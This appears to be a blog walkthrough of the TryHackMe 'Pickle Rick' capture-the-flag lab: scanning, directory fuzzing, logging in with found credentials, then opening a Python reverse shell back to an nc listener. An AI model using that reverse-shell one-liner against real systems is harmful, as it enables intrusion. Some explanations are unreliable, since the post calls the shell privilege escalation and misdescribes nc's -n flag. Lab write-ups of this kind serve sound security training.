Pickle Rick TryHackMe Walkthrough

pickle-rick

This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.

Today we will see how to solve a capture the flag challenge called “Pickle Rick”. It is a penetration testing lab available at TryHackMe. This challenge gives us hands-on on basic penetration testing techniques. It includes techniques such as scanning, enumeration, privilege escalation.

Credits for the machine goes to – TryHackMe

ethical hacking course

  Level: Easy

# What is the first ingredient Rick needs?

First of all, we will scan the machine IP with nmap and check all services are working on the machine. We found that on port no 80 HTTP services are active.

Nmap

We will now check the source page of the website and see if we can get some hints. Here we found the username.
Username ->R1ckRul3s

pickle-rick-user-name

Next, we tried to find the open directories using the tool ffuf. There are 2 open directories index.html and robots.txt .
command -> ffuf -t 100 -c -w /usr/share/dirb/wordlists/common.txt -u http://<machine_ip>/FUZZ

Ffuf-directory-scan

Then we will try to open the directories we found.  found a value in robots.txt.

pickle-rick-password

 

 

We will now search for a login page. We have scanned the website further and found a login page “login.php”.

pickle-rick-login-page

Open the login page and enter username and password we inittitaly found.

Username ->R1ckRul3s
password-> Wubbalubbadubdub

pickle-rick-login-pannel

We will then get a command panel
command -> ls

pickle-rick-logi-command-pannel

Sup3rS3cretPickl3Ingred.txt file contains the first flag!

 

 

 

# Whats the second ingredient Rick needs?

 

Since we didn’t have the super user access, we have to escalate our privileges.

For escalating our privileges we have used python3.
Command:
python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“<machine_IP>”,<Port_no>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

Python-Privilege-Escalation

Before executing the command open the listening port.
command -> nc -lnvp <port_no>
-l => for opening listening port
-n => for getting the reverse shell
-v => for verbose
-p => for port number

After executing the command we will get a reverse shell.

netcat-listener-command

#Whats the second ingredient Rick needs?

Traverse through the directories to find the flag 2!
command -> cat ‘second ingredients’

pickle-rick-flag-2

# Whats the final ingredient Rick needs?

Traverse through the directories to find the flag 3!
command -> cat 3rd.txt

pickle-rick-flag-3

 

You May Also Like:-

How do find all hidden files and folders of web applications?
How to Find Information About Websites with Th3inspector

 

 

Previous articleWhat is RSA Algorithm How to Encrypt and Decrypt Plain Text
Next articleMaharashtra: 105 got arrested in Maharashtra in CSAM case.

LEAVE A REPLY

Please enter your comment!
Please enter your name here